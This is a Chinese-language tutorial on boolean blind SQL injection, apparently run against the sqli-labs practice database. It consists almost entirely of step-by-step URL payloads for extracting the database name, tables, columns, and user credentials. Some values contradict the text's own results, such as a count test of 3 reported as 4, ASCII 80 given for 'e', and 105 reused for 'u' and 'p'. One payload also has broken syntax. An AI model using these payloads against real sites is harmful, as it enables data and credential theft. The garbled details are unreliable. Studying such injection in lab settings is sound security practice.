布尔盲注
布尔盲注,即在页面没有错误回显时完成的注入攻击,此时我们输入的语句让页面呈现出两种状态,相当于True和False,而根据这两种状态可以判断我们输入的语句是否查询成功
重点:A-Z:65-90
a-z:97-122
一般布尔盲注(手工注入过于繁琐;不建议手注)可借助工具如SQLMAP....
1.判断注入点
?id=1
?id=2
?id=1'
?id=1'--+
没有显示位,判断为字符型注入
布尔盲注+BP抓包
2.判断数据库长度
?id=1' and length(database())>1--+ //正常
?id=1' and length(database())>10--+ //报错
?id=1' and length(database())>5--+ //正常
?id=1' and length(database())>8--+ //报错
?id=1' and length(database())>7--+ //正常大于7正常显示,大于8不显示,说明大于7而不大于8,所以可知当前数据库长度为8个字符(二分法)
?id=1' and length(database())=8 --+
数据库长度为8
3.爆破数据库名
?id=1' and ascii(substr((database()),1,1)) >100 --+ //正常
?id=1' and ascii(substr((database()),1,1)) >110 --+ //正常
?id=1' and ascii(substr((database()),1,1)) >114 --+ //正常
?id=1' and ascii(substr((database()),1,1)) >115 --+ //报错当ascll值为115时回显说明第一个字符为‘s’剩下的字符依次进行解密
?id=1' and ascii(substr((database()),1,1)) =115 --+
database='security'
4.判断表的数量
?id=1' and (select count(table_name) from information_schema.tables where table_schema=database())=3--+
表的数量为4
5.爆破表名
第一张表名
第一张表的长度
?id=1' and length((select table_name from information_schema.tables where table_schema=database() limit 0,1))=6--+
第一张表的长度为6
第一张表的名称
?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))=80--+
第一张表名:emails
(同理,获得其它几张表的表名)
第四张表名
第四张表的长度
?id=1' and length((select table_name from information_schema.tables where table_schema=database() limit 3,1))=6--+
第四张表的名称
?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 3,1),1,1))=100--+
第四张表名:users
6.获取字段数
?id=1' and (select count(column_name) from information_schema.columns where table_schema=database() and table_name='users' limit 0,1)=3--+
字段数为3
7.获得字段名
第一个字段名
?id=1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' and table_schema = 'security' limit 0,1),1,1))=105--+
第一个字段名:id
(同理,获得其它几个字段名)
第二个字段名
?id=1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' and table_schema = 'security' limit 1,1),1,1))=105--+
第二个字段名:username
第三个字段名
?id=1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' and table_schema = 'security' limit(2,1),1,1))=105--+
第三个字段名:password
8.获取表中数据
获取条数
?id=1' and (select count(*) from users)=13 --+
数据条数为13
判断数据长度
?id=1' and length((select username from users limit 0,1))=4 --+
username字段的第一个数据长度为4
获得数据
username
?id=1' and ascii(substr((select username from users limit 0,1),1,1))=68 --+
因为首字母大写,取值范围从65-122
username字段的第一个数据为Dumb
password
?id=1' and ascii(substr((select password from users limit 0,1),1,1))=68 --+
password字段的第一个数据为Dumb
(同理,可以获得其它id的username,password)
